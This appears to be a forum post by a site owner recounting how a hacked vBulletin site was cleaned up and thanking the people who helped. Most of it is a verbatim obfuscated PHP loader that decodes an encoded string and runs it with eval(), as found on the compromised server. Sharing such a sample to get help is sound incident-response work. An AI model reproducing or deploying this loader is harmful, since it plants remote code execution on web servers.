(-(.-_(:(^(,(:(.+`+_(-(_(:(.(,(.(:-_(.)](,(_(:+|(,-^(.-_(`-^(])]+_(-)](^({(^(,(](`(`(_(:(_(](:(_({+_(-(`(](,(`)](](](.+_(-(^)](^(.+_(-({(:-_(:({+_(-({(.(`(]+`(.+|(:(:+_(--_(.(_(^-^(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(](`(`(_(.)](](_(`(`+_(-({(_(_(`(.(,(`(_+|(:+|(,)](_+_(-(^+{(:(,(,+|(`+{(]-^(:)](_+{(.+{(.(:(](^+_(-,&(,({(:)](:(_+_(-+`(:(_(,(](_(.(`(.(,+`(_)]+_(-(.(,(.(](.(`+{(^(:(_(:(.({(_(,(](:(^-_(,(.(.(:+_(--^(^(_(,,&(_-_+_(-)](,+|(:+|+_(-+`(.-_(:({(](:(_+_(-(^+`(^-^(])](.(^(:+{(]({(`+`(](:(](,(^-_(_(.(:-^(:+|(`+{(_(.(^+{+_(-)](,+|(.(]+_(-({(.(:(.(.(,-^(_,&+_(-(.(,+_(-(](`(`(,+_(--^(.-_(,(`(]+`(_({(`({(]-_(:(`+_(-({(^(,(]+{+_(-+`(,,&(:-^(,(:(](^(`+{(`({(^+{+_(-)](](](.-^(,(^(,-^(.+{(:(_(:,&(]({(_(:(_,&(_+_(-(]+|(:-_(`+{+_(-+|(:+`(:(,(,(_(:(_(](.(_+{+_(-(_(,,&(.(,(^)]+_(-(](](:(`(_(.+`(](:(`+`(_(,(](:(^-_(_(.(:-^(:+|(`+{(_(.(^+{(^(,(]-^(:+_(-(^(`(,+`(:(,+_(-)](.(,(^(`+_(-(_(](:(`(_(.+`(](_(_+{(^+{(`(:(_(](](.(`-^(:+|(`+{(_(.(^+{(^(,(.+`(:(^+_(-,&(:({(:-_+_(--_(.(,+_(--^(^(_(,,&(`-^(`,&(,({(`+`(^+_(-(](,(^-_(_(.(]+|(]+{(`({(_(.(^+{(^(,(.+`(:(^(,)](.(_(:)]+_(-({(.(,+_(--^(^(_(,,&(`+{(_(.(_(,(^+`(_(:(](:(:(:(,({(.,&(^)](^(.(])]+_(-,&+_(-(.(:(_(:,&(]({(`+_(-(^+|(_(.(]+|(]+{(`({(_(.(^+{+_(-)](,+|(:(,(,(_(.(^(.(^(,-^(_,&+_(-(.(,+_(-(](.(_)](^(:(_(:(.-^(_(,(:(`(^+|(](](_+`(^(.+_(-,&(]+{(.+_(-(:(](,+{(.+_(-+_(--^(_+`(:(:+_(-(:(.(,(^(^(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,+_(-(,(_(:(:(.+{+_(--^(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(^({(.(.(_(,(^+`(,(:(.+|(`-^(]-_(.(_(,+{(]-_(^(_(`(,(.-^(,(.(:+`(,)](.(.(`(_+_(-({(:(,(](_+_(-(`+_(-)](:(](:+|+_(--^(:(,(,(.(_+`(_(`(^(^(_(^+_(-)]+_(-(_(,-^(.(](`(_(,(](.(_(,(_(.(_(`(_(^)](`+{+_(-(_(^,&(,-_(:(`(.-_(](^(:,&+_(--_(.(_(:+`(]+{(_(:+_(-(,(^(.(,-^(:+_(-(:+_(-(,(^(`(:(.(^(,+_(-(`(](](.(]-_(:-_(,)](_+_(-(^+{(^(,(,-_(:(,(,(.(.(^(`(_(])](,+`(`,&(.-^(,(^(`(,(_(.(_(,(^+`+_(-(`(](,(^-_(,-^(.)](](^+_(-(`(,(.(:(](`+_(-(.+`(.(,+_(--^(:({(.(^+_(--_(:(`+_(--^(^(_(,({(`-^(`+{+_(-)](.(_+_(-+`(.-_(.(](,,&(.(,(](.+_(-+_(-(,(:(`(,(`(,(](:(^)](_(:(:+_(-(^+|(_(.(]+|+_(-(.+_(-(:(^(_+_(-(.(:+|+_(-(.(.(:(,(_(.(^(:(.(,-^(_,&+_(-+_(-(^(.(]+|(`-^(`,&(,)](`+`(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_(`(`(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_(`(`(,+{+_(-+_(-(_(.(:(_(_+|(,,&(`({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+`(,+`(.+_(-(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+{+_(-(,(.+`(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+`(]-_(:+_(-(`(,(^+_(-(.-^(_(,(](:(:(:(,(`(:(_(^(:+_(-+{(,,&(`+`(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({(`+{(_(.+_(-(`(^)](_(:(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|+_(-)](.(.(:(:(,(`(.)](_)]+_(-(`+_(-(:(:(`(:+`(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+`+_(--^(:(](:(`(.+_(-(,-_(:(,(](.(_-^(:(^(](.(`-^(]+{(`({(_(.(:(`(:(^+_(-)](:(_(,(:(.+|(`-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:(`(:(,(,+|(`+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+`(:(_(,(](_(:(.,&+_(-(:+_(-+`(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(:(,+`(,-^(:+_(-(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,(`(`(,(](`(`(`+_(-(:({(.-_(`+|(.(](,(,+_(-(`(_-_+_(-({(:({(:({+_(-(:(:+|(]+|(`-^(:+|(^(_(,({(_-_(`,&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+`(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.(`+`(`,&(,)](`+`(](:(:+_(-(`(.(,({(`({+_(-(.(.,&(:+{+_(-,&(,+`(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(,,&(`+`+_(-)](,-_(:-^+_(-+`(:-^(.-_(](:(_+_(-(^(^(^+{(](.(.)](`,&(,)](_-^(]-^+_(-(^+_(-+_(-(.-^+_(-+_(-(_,&(^(_(,(^(,-_(_(.+_(-(`(^)](,(:(.+|(`-^(.+{(.(.(^(:(,(_(:(](:-_(:({(,,&(:+`(,)]+_(-(^(.(`+_(--^(.+`(](.+_(-(`+_(-({(,,&(:-^+_(-+`(:(,(](.(_(:(`-_+_(-(,(_+_(-(^(^(]-_+_(-({(.(_(.+{(,(:(.(:+_(-)](.(_(:(`+_(-({(.,&(^(:(,+_(-(](:(`(_(:+`(](:(_({+_(-(`(](,(.-^(:(](:(_(^+{+_(-(:+_(-)](.(_(,(_(,-_(.+{(,-_(.)](`-^(]-_(.(_+_(--_(])](_+_(-(-(_(*,*)`(-(-)^*&,|-(,*(.(*,++^(*,|+`(:)^(*,|(^(^(:-^,:,,(.(*,|)_)\'),(:-^(*,.+^(*,++^(*,|+`+`)`(*,|)^-`,+,_-),+-^(*,*({)`*&,),.-((.(.(*,.+^(*,++^(*,|+`+`)_)_)*(:(^(.(*,.+^(*,++^( ^(^(*,|+`+`(:(:)^-`-`,:,,(.(\'*&,:-)-),+-*(.(*+|+)*++(+,*++((:(:-^(*+|*)*|*|*^*:*+)`(,(**.+*+*+&+|*)*|*|*^*:*++|+,*\'+(+))^(*+|+&*|+)+*)`(,(**.+*+*+&+|+&*|+)+*+|+,*\'+(+))^(*+|*-*++*)`(,(**.+*+*+&+|*-*++*+|+,*\'+(+))^-`(*,^)`(*+|*)*|*|*^*:*++^(-,^,+-:(-+`)^,:,,(.,+,`-&-*-:(.(*,^(:(:-^(*,^)`(*+|+&*|+)+*+^(-,^,+-:(-+`)^-`,:,,(.,+,`-&-*-:(.(*,^(:(:-^(*,^)`(*+|*-*++*+^(-,^,+-:(-+`)^-`,:,,(.(\'*&,,-+,{,)-*,:,|,{+|,+-.,:-)-*-)(.(-,*,+,)-(-:-&-*(-(:(:-^,+-,,\',_(.(-,,-+,{,)-*,:,|,{(&,*,+,)-(-:-&-*(.(*,+(_(*,^(:-^,:,,(.(\'(*,^(:-^-(,+-*-+-(,{)^-`(*,+,_)`*&-)-*-(,_,+,{(.(*,+(:)^(*,^,_)`*&-)-*-(,_,+,{(.(*,^(:)^(*-(,_)`(*,+,_(+(*,^,_)^(*,,,_)`(*,+,_(`(*-(,_)^,,,|-((.(*,|)`)&)^(*,|)_(*,,,_)^(*,|(^)`(*,^,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`,:,,(.(*-(,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)`*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`-(,+-*-+-(,{(.(*,*(:)^-`(-(:)^-`(*,*)`*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>

I found eerily similar listed on Securi's site with a good explanation as to what this file can do and long story short it wasn't good at all.

After removing all malicious/infected files and overwriting all files and ensuring it was up-to-date everything seems to have resolved itself.

Serious points, TLS. For everyone else reading, TLS (on behalf of URLJet) determined that our site was hacked. Apparently one of many vb sites, and it might never have been discovered it if not for these recent issues.

So for now at least, staying with URLJet... if I'd up and decided to move, previous to posting here, our problems would have followed right along with us. Some major cleanup and hopefully on to better things.

Thanks Dave, RB67, I appreciate the thoughts and feedback.